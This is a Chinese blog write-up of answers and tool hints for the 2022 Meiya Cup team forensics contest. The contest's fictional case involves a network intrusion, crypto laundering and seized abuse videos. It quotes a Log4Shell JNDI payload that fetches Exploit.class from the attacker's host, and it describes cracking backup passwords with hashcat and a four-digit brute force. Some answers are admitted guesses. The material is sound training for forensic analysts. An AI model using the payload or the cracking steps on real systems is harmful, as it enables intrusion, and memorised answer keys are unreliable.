2022第八届美亚杯团体赛

2022第八届美亚杯团体赛

团体赛做了前前后后有一个多星期吧，难度比个人赛大多了，里面对硬件卷组的考察要求更高，raid重组，案件的分析也是综合性的，嫌疑人和受害人多方都是需要去分析的

参考链接：https://blog.csdn.net/WXjzcccc/article/details/128175094?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169892206716800225587790%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=169892206716800225587790&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_alltop_click~default-4-128175094-null-null.142^v96pc_search_result_base6&utm_term=2022%E7%BE%8E%E4%BA%9A%E6%9D%AF%E5%9B%A2%E4%BD%93%E8%B5%9B&spm=1018.2226.3001.4187

1.[填空题] 在朗尼手机于2022年9月30日的 ‘WhatsApp’ 对话里，有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 ‘VPN’ 的租金? (以阿拉伯数字回答) (3分)

3000

找到之后导出倒放

2.[填空题] 就AGC集团网络的流媒体服务器 (Media Server)，有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)

3

sudo last

last

last命令的功能是用于显示用户历史登录情况，通过查看系统记录的日志文件内容，进而使管理员可以获知谁曾经或者试图连接过服务器。

登录时可以查看到用户

3.[填空题] 就AGC集团网络的流媒体服务器，有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)

3

lastlog查看

4. [填空题]就上述的本地用户，成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)

12

ssh登录肯定得有ip地址，推测tty2是本地登录，这个我也不确定，但是看记录就是12

***5.[单选题] 试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)

A. Iamhacker

B. hacking

C. Hack

D. Hacker

E. 以上皆非

C

这个是日志文件的备份

把btmp文件导入流媒体服务器查看 ，用last -f btmp

lastb 可以读取日志中登录尝试失败的账户信息

lastb -f btmp

建议去了解linux日志目录的规范

6.[填空题] 就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)

Li

这个用户应该是sammy

全局搜索sammy，检视文件，半蒙半猜

第九题翻数据库意外找到的

7.[多选题] 该流媒体服务器是有使用Docker容器 (Docker Container) 的，当中包含以下哪个Docker镜像 (Docker Image) ? (3分)

A. apache2

B. Ubuntu

C. Centos

D. Nginx

E. hello-world

F. 以上皆非

BCDE

火眼里面直接可以看到

docker images可以查看镜像列表

8.[单选题] 就上述的Docker镜像，哪一个镜像在系统上运行中? (2分)

A. apache2

B. ubuntu

C. centos

D. nginx

E. hello-world

F. 以上皆非

D

火眼直接查看

docker ps查看运行的容器信息

9.[多选题] 该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的， 就 ‘比特币’ 标题， 有以下的电子邮箱地址曾经留有评论? (2分)

A. cn.wordpress.org

B. root58462@mail.qq.com

C. hi456@163.com

D. root@163.com

E. user1@localhost.net

F. 以上皆非

BC

在火眼里进行数据库分析

有些内容，软件跑不出来，仿真进去看

这是wordpress的配置信息

进入wordpress，看表wp_comments，输入select * from wp_comments；

10.[单选题] 该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)

A. https://weibo.com

B. http://www.baidu.com

C. https://www.douyin.com

D. https://youku.com

E. https://www.binance.com

F. 以上皆非

E

查看calendar日历工具

11.[单选题] 该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)A. RAID 0B. RAIDz2C. RAIDz3D. RAID 10E. RAID 5F. 以上皆非

zpool status命令查看，显示ZFS文件系统

12.[单选题] 该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)

A.Jun
B.Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非

D

/media0/mediastorage下面检视一下就ok

13.[填空题] 承上题，拥有该段儿童色情影片的用户名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答) (1分)

root

直接ll -lh查看就好了

14.[填空题] 就AGC集团网络的流媒体服务器，曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果，该用户所输入的网址是什么? (不要输入符号，以大写英文及阿拉伯数字回答，如 https://web3.com，需回答 HTTPSWEB3COM) (2分)

尝试检索无果

就去看别人的解析

对字段“儿童色情”进行url编码，全局检索

15.[填空题] 该基本镜像存储池 (pool) 有一个快照 (Snapshot)，快照的名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答，如 media/mediapool@abc123，需回答MEDIAMEDIAPOOLABC123) (1分)

MEDIA0MEDIASTORAGEVERSION1

ZFS文件系统，可以使用 zfs list -t snapshot 命令来列出所有快照和它们的名称

16.[填空题] 就上述所找到的基本镜像存储池快照 (Snapshot)，它储存了多少个档案? (以阿拉伯数字回答) (1分)

30

zfs rollback media0/mediastorage@version1恢复到原来的快照

17.[单选题] 王景浩的USB记忆棒里有一个 ‘Data’ 文件夹 (Folder)，它存有哪一种类型的密钥文件? (1分)

A. Pem

B. Cer

C. Crt

D. Key

E. 以上皆非

A

可以看到文本，很明显就是pem格式文件

18.[多选题] 承上题，‘Data’ 文件夹里有一个被加密了的档案，它是被哪一种加密方法加密? (2分)

A. Symmetric

B. PGP

C. Twofish

D. RSA

E. Triple DES

AD

从语法结构可以看出是python，第二张图是加密过程，仔细读，与选项对应

19.[单选题] 尝试将档案解密，该档案属于哪一个类型 (File type)? (2分)

A. Exe

B. Ods

C. Rtf

D. Sql

E. 以上皆非

D

见下题

***20.[多选题] 承上题，找出以下哪一个名字出现在该档案里? (3分)

A. Armand To

B. Adam Smasher

C. Beverly Kot

D. Huma Chan

E. 以上皆非

这是我自己解密的脚本，确实还存在问题，rsa要以pkcs1读取文件，返回一个私钥，并以此解密，这是因为文件在加密的时候，以pkcs1转换了私钥，要做一步处理

而且这里在开始做的时候，文件也找错了，比赛的时候直接试试两个文件就好了，而且minecraft.exe也很奇怪，一个exe文件的预览怎么会是像base64呢，很奇怪的

脚本对比大佬脚本进行修正

不知道为啥我的还是有报错

21.[单选题] 分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令，它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)

A. http://155.137.195.111:8080

B. http://www.w3.org/2003/05/soap-envelope

C. http://61.238.217.108:8000

D. 以上皆非

A

使用过滤器查看，看到get

追踪http流

22.[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令，它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)

A. Root

B. ${jndi:ldap://61.238.217.108:1389/a}

C. application/x-www-form-urlencoded

D. password

B

过滤器过滤之后，追踪http流

URL解码

23.[单选题] AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后，它执行了哪些行动? (2分)

A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口

B. 于IP地址61.238.217.108下载了Exploit.class

C. 使用端口49264连接IP地址61.238.217.108发送同步要求

D. 以上皆是

D

综合分析，虽然说LDAP一般端口是389，现在连接的是1389，不排除修改端口的可能性，post请求之后AGC服务器10.0.66.184确实对目标ip进行了TCP连接，应该是对的

搜索Exploit.class，发现找到了，还是一个get请求

先追踪118的TCP流，查看

很明显是一个linux交互的环节

这里用ftp下载文件，应该是发送同步要求

24.[填空题] 在上述行动后，IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)

9001

FTP协议结束然后就用9001端口了

25.[多选题] AGC服务器10.0.66.184里有一个AGC目录 (Directory)，它的子目录 (Sub Directory) 包含以下哪一个? (2分)

A. Accounting

B. Picture

C. Staff

D. Sambashare

E. Retail

ACE

还是在上面的地方，追踪TCP流

26.[多选题] 入侵者迸入AGC服务器10.0.66.184后，他成功执行以下哪些指令? (2分)

A. 檢视了readme.txt内容

B. 删除了三个档案

C. 删除了一个目录 (Directory)

D. 替档案改名

E. 建立了两个txt档案

DE

B选项是删掉了两个文档

新建两个txt

替文档改名

27.[单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename)，这个档案的原来名称是什么？ (1分)

A. cGhvdG9zT0Zyb2NreQ==

B. Finanical.xls

C. readme.txt

D. anonymous

A

28.[单选题] 承上题，该档案原档的建立日期是什么? (2分)

A. 2022-10-21 08:10:30 (UTC+0)

B. 2022-10-21 16:19:39 (UTC+0)

C. 2022-10-22 08:10:30 (UTC+0)

D. 2022-10-22 14:22:06 (UTC+0)

E. 2022-10-22 16:19:39(UTC+0)

D

使用foremost工具分离

我的查看不到

29.[单选题] 承上题，该档案的SHA-256哈希值是什么? (3分)

A. a6eef1… …27364c

B. 54785c… …fe86f0

C. 961f2b… …647d55

D. a00e6c… …d0eaab

E. 以上皆非

E

30.[多选题] 通过取证调查结果迸行分析 (包括但不限于以上问题及情节)，以下哪项关于王景浩的推断是正确的? (5分)

A. 曾经采用他的计算机入侵AGC集团网络

B. 传播儿童色情物品

C. 于AGC集团取得大量客户资料

D. 通过VPN取得Rooney家里的IP地址

E. 企图更改AGC集团的网页

ACDE

儿童色情影片观看了，但没有传播

31.[单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ，它的实際安装时间是什么? (以时区UTC+8回答) (3分)

A. 2022-09-26 14:35:17

B. 2022-09-26 21:35:17

C. 2022-09-27 05:35:17

D. 2022-10-05 03:52:15

E. 2022-10-05 11:52:15

一开始，不知道哪台是AGC-CS，看到设备名称才知道

火眼软件的很奇怪，这个镜像最后一次正常关机时间在系统安装时间前面

32.[单选题] AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (1分)

A. 2022-09-28 19:01:40

B. 2022-09-28 07:18:33

C. 2022-08-30 19:01:40

D. 2022-08-30 07:18:33

A

取证大师能看到

33.[单选题] AGC-CS计算机里的用户 ‘Carson’ 链接了一个网络磁盘机 (Network Drive)，在下列哪一个档案有相关资料? (2分)

A. \Users\Carson\NTUSER.DAT

B. \Users\admin\NTUSER.DAT

C. \Windows\System32\config\SYSTEM

D. \Windows\System32\config\SOFTWARE

E. \Windows\System32\config\SECURITY

34.[单选题] 承上题，用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)

A. \192.168.182.134

B. \192.168.182.134\photo

C. \192.168.182.134\share

D. \192.168.182.134\AGC

E. \192.168.182.134\AGC photo

C

35.[填空题] 分析计算机里的电邮数据，当中包含嫌疑人王景浩可能的居住地址，请回答他住址的楼层 (以阿拉伯数字回答) (1分)

45

36.[填空题] 承上题，王景浩使用的信用卡号码最后四位数字是? (1分)

6717

37.[填空题] AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件，那个档案的档案名是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (1分)

KEFMUONDOCX

这个上面的链接

直接打开，失败了

查看这个文件

38.[单选题] 承上题，分析该 ‘Word’ 文件，它的可能用途是? (3分)

A. 访问一个网站

B. 记录键盘操作

C. 把档案加密

D. 改变桌面壁纸

E. 关闭计算机

A

39.[单选题] AGC-CS计算机里有一个名为 ‘admin’ 的用户，它是在何时被建立的? (以时区UTC+8回答) (1分)

A. 2022-09-28

B. 2022-09-29

C. 2022-09-30

D. 2022-10-01

E. 以上皆非

B

最早的成功登录的时间，最早的登录失败的时间，最早的修改密码的时间

40.[填空题] 黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (2分)

20220929204102

41.[填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件，这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)

PUTTY

30号下了一个putty

42.[填空题] 承上题，黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。 当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘：’ 或 ‘-’ ，以大写英文及阿拉伯数字回答) (3分)

9061AEC09045

查看了AGC的电脑信息，发现没有

尝试看下接收端的文件

查看信息

43.[填空题] AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案，这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)

320A98F6519748D16B8870EF4D8A606D656C5A09CF2F660AA35EBF6495824CB1

只能看到是这个文件，不知道如何从导出的文件中分离出来

仿真试了也不行

去黑客王景浩电脑看看

导出算sha356

44.[单选题] 黑客除了通过 ‘RDP’ 外，还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)

A. VNC

B. Teamviewer

C. Anydesk

D. Splashtop Business Access

E. RemotePC

teamviewer

45.[填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) ‘pve’ 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)

这个raid重组，干了一晚上，第一次接触，确实有点难

46.[填空题] AGC_Server里LVM 的 LV(邏輯卷)“pve-data” 使用了多少百分比的空間? (不用填寫 ‘%’，以阿拉伯数字回答) (3分)

47.[多选题] AGC_Server里的 ‘Proxmox’ 虚拟化环境 (Virtual Environment - VE) 有哪一个用户? (2分)

A. root

B. VM_admin

C. sysadmin

D. aclE. tss

48.[填空题] 分析 ‘VM’ (虚拟机) 编号 ‘111’ AGC网站的网页服务器日志，当中记录了黑客曾向该服务器发出多少次與远程代码執行 (Remote Code Execution) 的网络攻击？ (以阿拉伯数字回答) (2分)

49.[单选题] 哪一个IP地址尝试登录’VM’ (虚拟机) 编号 ‘111’ 失败次数最多? (1分)

A. 38.242.130.207

B. 218.92.0.206

C. 43.142.93.22

D. 121.202.141.105

E. 61.238.217.108

50.[填空题] 黑客在入侵 ‘VM’ 编号 ‘111’ 后，打算涂改AGC公司的网页，黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答) (3分)

51.[多选题] 根据 ‘VM’ 编号 ‘111’ 里的网页服务器 (Web Server) 的设定，访客可从下列哪个网页地址访问这个服务器? (2分)A. localhostB. www.ag.com.shopC. www.agcom.shopD. agcom.shopE. www.agcom.com

52.[填空题] 黑客曾入侵 ‘VM’ 编号 ‘111’ 里的电邮系统 ‘Xeams’，他登录的时间是? (以unix时间戳回答，格式如:1665049779010) (2分)

53.[单选题] 黑客在入侵后盗用AGC员工电邮户口及冒充AGC员工回复了电邮给客户，发出这封电邮的操作系统 (Operating System) 及电邮软件 (Mail Agent) 是什么? (2分)

A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0

B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1

C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1

D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1

E. Windows 10 Pro Outlook 2016

54.[单选题] 黑客在 ‘Proxmox’ 里留下了一个被加密了的程序 (Program)，在解密后它的SHA-256哈希值 (Hash Value) 是什么? (2分)

A. C89D7A… …8C4E76

B. C7141F… …64BF65

C. E9433E… …1A5134

D. 45CE1C… …79BD4A

E. 0ACAA5… …AB7ECE

55.[填空题] 承上题，分析程序代码 (Program Code)，上述程序的档案名应该是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (3分)

56.[单选题] 于虚拟机 ‘VM’ 编号 ‘111’ 里的档案 ‘\srv\samba\share\AGCphoto\DSC01139.JPG’ ，照片中出现的街道名称是? (2分)

A. 河背街

B. 沙咀道

C. 众安街

D. 香车街

E. 川龙街

57.[单选题] 王景浩的计算机使用什么文件系统 (File System) ? (1分)

A. exFAT

B. APFS

C. HFS

D. HFS+

D

58.[单选题] 王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)

A. 10.4.11

B. 10.9.5

C. 10.10.5

D. 10.11.6

D

59.[填空题] 王景浩的计算机当前有多少个用户 (包括访客 ‘Guest’ )? (以阿拉伯数字回答) (1分)

6

60.[填空题] 王景浩的计算机里有一个用户被删除，被删除的用户名称是什么? (以大写英文回答) (1分)

BROTHER

61.[填空题] 王景浩的计算机有多少个 ‘聚焦’ 的搜索记録 (Spotlight Search) ? (以阿拉伯数字回答) (1分)

9

搜索spotlight

这题有点懵

62.[单选题] 当用户设置了自动登录 (Auto Login) 后，王景浩计算机的操作系统会产生哪个档案? (2分)

A. manifest.plist

B. info.plist

C. PasswordPanel.strings

D. kcpassword

D

查下目录规范

63.[单选题] 王景浩计算机的登录密码 (Login Password) 是什么? (2分)

A. 1qa@WS3ed

B. 3ed$RF5tg

C. 5tg^YH7uj

D. 2ws$RF6yh

D

尝试四个密码

更快的解法

64.[单选题] 在王景浩的计算机里，他最后使用哪个电邮地址登录 ‘iCloud’ 账号? (2分)

A. kinghoo0w0@gmail.com

B. wonghoo588@yahoo.com

C. kingho726@aol.com

D. kinghoo0w0@yahoo.com

取证大师直接查

仿真进去看

65.[多选题] 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本? (2分)

A. 12.5.6

B. 15.4

C. 15.5

D. 16.0.3

AC

66.[填空题] 王景浩曾经将一台 iPhone 6 连接他的计算机，请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (2分)

20221021181730

67.[单选题] 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案? (2分)

A. Info.plist

B. privacy.json

C. Manifest.plist

D. PasswordPanel.strings

C

苹果手机备份的密码（iTunes Backup Encryption Password）通常会记录在 Manifest.plist 档案中。

这个文件包含了有关备份的信息，包括是否启用了备份加密以及备份加密所使用的密码。

68.[多选题] 以下哪种工具可以用作破解密码? (1分)

A. Passware

B. John The Ripper

C. HashCat

D. Password Recovery Toolkit

ABCD

***69.[多选题] 通过 ‘hashcat’ 破解 ‘iTunes Backup’ 密码需要制订一个 ‘txt’ 档案，若该备份的手机iOS版本是10以上，需要按照下列哪个提示字符 (String) 的数据去制订这个 ‘txt’ 档案? (3分)

A. WPKY

B. ITER

C. SALT

D. DPIC

E. DPSL

70.[填空题] 王景浩采用了4位数字加密了他的iPhone XR的备份，分析它的密码是什么? (以阿拉伯数字回答) (3分)

2022

自己写一个简单的四位数字典脚本

进行密码攻击

***71.[填空题] 最后一次连上王景浩计算机的3D打印机的IP 地址是什么? (不要输入答案中的 ‘.’，以阿拉伯数字回答) (2分)

72.[填空题] 3D打印机最后一次在王景浩的计算机尝试打印的时间? (以时区UTC+8回答) (2分)

20221020162806

73.[单选题] 最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)

A. CE3_balljoint_extender.gcode

B. um3-penguin-real-mini-keychain-merged-tpu.gcode

C. CE3_Prancer.gcode

D. CE3_2020-psu-atx-mount.gcode

D

74.[单选题] 王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)

A. 百度

B. 谷歌

C. 360

D. Safari

A

仿真进去，随便打几个字就能看见

75.[单选题] 分析王景浩计算机的数据，王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)

A. bc1quw… …zpzjzt

B. bc1qm… …5f7n9g

C. bc1q79… …h4sq52

D. bc1qsl… …je7hkk

A

在邮件附件里面翻到的

76.[单选题] AGC公司员工 ‘Carson’ 有一个由公司发给他的电邮账户，分析王景浩的计算机数据并找出 ‘Carson’ 的电邮账户密码。 (2分)

A. AGC2020@pw

B. AGC2012@PW

C. AGC2020@hkg

D. AGC2021@PW

A

***77.[填空题] 王景浩曾经冒充AGC公司员工 ‘Carson’ 发送电邮给AGC 客户，这封电邮的 ‘Message-ID’ 是什么? 回答它的首８位数值。(以大写英文和阿拉伯数字回答，如 4GEF90GD) (2分)

看佬的答案是这个，我也推不出来为什么是这封邮件

我个人猜测是这两封，因为有银行卡号，第一封有账单文件，第二封可能性更大

***78.[多选题] 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据? (2分)

A. Teamviewer

B. OpenVPN

C. Remote Desktop Manager

D. Tor Browser

79.[多选题] 王景浩在AGC公司盗取了下列什么类型的档案? (2分)

A. ost

B. xlsx

C. jpg

D. docx

AB

teamviewer里面有

80.[填空题] 王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN)，这个VPN的IP地址是什么? (不要输入答案中的 ‘.’，以阿拉伯数字回答) (2分)

61238217108

搜索，VPN的日志文件，分析就好了

简单的日志分析

81.[填空题] 装置 ‘「KingHoo」的iPhone’ 的蓝牙媒体访问控制地址 (MAC Address) 是什么? (不要输入答案中的 ‘：’ 或 ‘-’ ，以大写英文及阿拉伯数字回答) (1分)

c81ee74af933

取证大师，系统和硬件这块的底层做的没话说

82.[单选题] 王景浩何时将 ‘小宝’ 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)

A. 2022年07月14日

B. 2022年07月15日

C. 2022年07月16日

D. 2022年07月17日

E. 2022年07月18日

A

和前面的题目联系起来了

83.[单选题] 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到多少存款? (1分)

A. HKD298.8

B. HKD344.7

C. HKD396

D. HKD543

E. HKD465.1

B

84.[单选题] 王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)

A. KEF

B. EDIFIER

C. BOSE

D. YAMAHA

E. Bowers & Wilkins

D

85.[单选题] 王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机， 当天试飞的地点在哪里? (2分)

A. 大埔海滨

B. 启德

C. 数码港

D. 西环

E. 将军澳

D

百度查到的

不多说了，火眼软件的优势

86.[单选题] 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久? (2分)

A. 6分58秒

B. 8分10秒

C. 9分6秒

D. 11分1秒

E. 15分33秒

说到无人机，大疆的市场份额是碾压式的

搜索大疆英文dji

87.[多选题] 王景浩用 iPhone XR 拍了一张照片’IMG_0012.HEIC’，那照片什么地方曾被修改? (3分)

A. 拍摄时间

B. 经纬度

C. 时区

D. 档案名称

E. 拍摄装备

创建时间也就是拍摄时间被修改

经纬度被修改

他的信息前者来自图片exif信息（被修改的），后者来自手机的数据库信息（最初的），应该是的

88.[填空题] 承上题，那张照片修改后的经纬度是什么? (不要输入答案中的 ‘.’，将经纬度合并回答。 如 22.2846135 114.1739116，需回答 2228461351141739116) (3分)

2286249931134190938

接上题，数据库里的信息才是对的

89.[单选题] 朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)

A. OpenWrt

B. admin

C. root

D. AsusRt

E. DDwrt

90.[多选题] 以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)

A. LAN地址是 192.168.1.24

B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务

C. WIFI登录密码为’OpenWrt

D. 提供网络时间协议 (NTP) 服务

E. 时区设置相等于UTC+8

91.[多选题] 承上题，‘VPN’ 服务器的IP地址及端口 (Port) 是什么? (2分)

A. IP地址 61.238.217.108

B. IP地址 192.168.8.1

C. IP地址 103.10.12.106

D. 端口 33248E. 端口 1194

F. 端口 1701

和80题都在日志里

92.[填空题] 朗尼草莓计算机操作系统设定了一个档案来储存系统的 ‘log_file’ ，档案名称是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (2分)

93.[单选题] 承上题，检视上述的档案，当中有几个IP地址曾经成功登录这个系统的 ‘VPN’ 服务? (3分)

A. 1

B. 2

C. 3

D. 4

E. 0

94.[单选题] 承上题，检视上述的档案，当中有几个IP地址曾经尝试以 ‘root’ 登入装置但因密码错误而不成功? (2分)

A. 2

B. 4

C. 5

D. 6

E. 8

95.[填空题] 根据装置的过往记录，‘log_file’ 是设在 ‘usr/rooney/’ 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)

96.[填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)

8004304896

97.[单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯，记忆卡共有多少个分区 (Partition) ? (1分)

A. 1

B. 2

C. 3

D. 4

E. 0

B

98.[单选题] 检视记忆卡上硬盘分区表资讯，第二个分区的分区代码 (Partition Code) 是什么? (1分)

A. 07

B. AF

C. 0C

D. 2B

E. 01

A

用ftk挂载再用diskgenius搜索分区就ok

99.[多选题] 记忆卡的档案不能被读取，记忆卡受损的原因包括? (2分)

A. 目录项结构 (Directory Entry) 受损

B. 启动扇区表 (Master Boot Record) 受损

C. 文件分配表 (File Allocation Table - FAT) 受损

D. 引导扇区 (Boot Sector) 受损

E. 以上各项皆是

AB

这几个目录项结构都是USBC坏道

这两个乱码应该是启动扇区表

100.[填空题] 承上题，通过分析及手动恢复还原，记忆卡里有多少个出錯的情况出现? (以阿拉伯数字回答) (3分)

8

搜索USBC坏块就好了，55 53 42 43 F0

看大佬的是可以手工取证的，试了一下，原理大概明白了，但是确实挺麻烦的，恢复大师一把梭哈

101.[多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案，它的SHA-256哈希值是 ‘F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF’。该档案显示了哪些影像? (2分)

A. 人

B. 山

C. 汽车

D. 交通灯

E. 天空

B

先利用x-ways恢复图片后缀导出

导出计算SHA256

软件不能导出一个什么csv或者excel文件，只能用笨办法了

再确认下

102.[单选题] 检视记忆卡的数据，在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中，曾经出现哪一个IP地址? (2分)

A. 61.238.217.108

B. 155.137.190.123

C. 192.168.1.66

D. 185.200.100.242

E. 213.104.156.111

D

从恢复大师中把相应时间段的文件导出之后，进行视频信息研判

***103.[填空题] 恢复还原后的记忆卡中，第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)

***104.[填空题] 记忆卡第一个文件系统中有一个视频档，它的SHA-256哈希值是 ‘847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19’，这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么? (以阿拉伯数字回答) (2分)

***105.[单选题] 尝试分析记忆卡数据結構受损的原因，通过合适的方法把数据恢复到原本没有出错的状况，记忆卡的SHA-256哈希值是什么？ (3分)

A. E63DF0… …8627D3

B. 3FD99E… …17B6DE

C. 3BADAA… …666A8F

D. BBB211… …E00710

E. AA9E81… …2C04FE

106.[单选题] 朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)

A. MetaMask

B. Electrum

C. Trezor

D. 以上皆非

B

桌面就有快捷方式

107.[填空题] 朗尼通过比特币替王景浩清洗黑钱，分析朗尼的计算机及手机，朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)

BC1Q0R0L3LH63WY865CD560KN3UHJQRWGGVTY4ZJ8N

检查whatsapp看到的

108.[单选题] 朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)

A. 1%

B. 4%

C. 7%

D. 10%

E. 15%

D

109.[单选题] 朗尼的计算机里有一个没被加密的比特币钱包，它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)

A. oppose

B. area

C. twice

D. roast

D

有五个钱包

rc没有被加密

检视之后选D

110.[单选题] 朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)

A. 1

B. 2

C. 3

D. 4

E. 5

E

选择五个钱包一一查看，只有rc未加密

111.[单选题] 朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里，这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)

A. DMG

B. PDF

C. ASD

D. ZIP

E. PNG

C

检索后缀名

能看到就行

这是后面做题发现的，这个正则搜索就很灵性

112.[单选题] 朗尼在手机里有一个加密了的比特币钱包，他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)

A. Safepal

B. Metamask

C. Changelly

D. Opensea

C

在手机相册里面

113.[单选题] 承上题，这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)

A. 2022-10-07 10:29时

B. 2022-10-07 11:06时

C. 2022-10-07 11:07时

D. 2022-10-07 13:54时

A

看资金，应该是上面的

114.[单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 ‘MetaMask’ ? (以时区UTC+8回答) (1分)

A. Chrome 2022-08-25 12:35时

B. Chrome 2022-10-07 14:29时

C. Firefox 2022-08-25 12:35时

D. Firefox 2022-10-07 14:29时

B

metamask是chrome里面的插件

C:\Users\langni001\AppData\Local\Google\Chrome\User Data\Default\Extensions

查这个chrome 的插件目录

115.[单选题] 朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)

A. Ethereum

B. Polygon

C. Solana

D. Arbitrum

E. Klaytn

A

116.[单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)

A. 2022-10-07 14:47时

B. 2022-10-07 14:49时

C. 2022-10-07 14:52时

D. 2022-10-07 14:54时

A

搜索opensea之后可以看到

***117.[多选题] 朗尼的手机里，有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)

A. Metamask

B. Opensea

C. Safepal

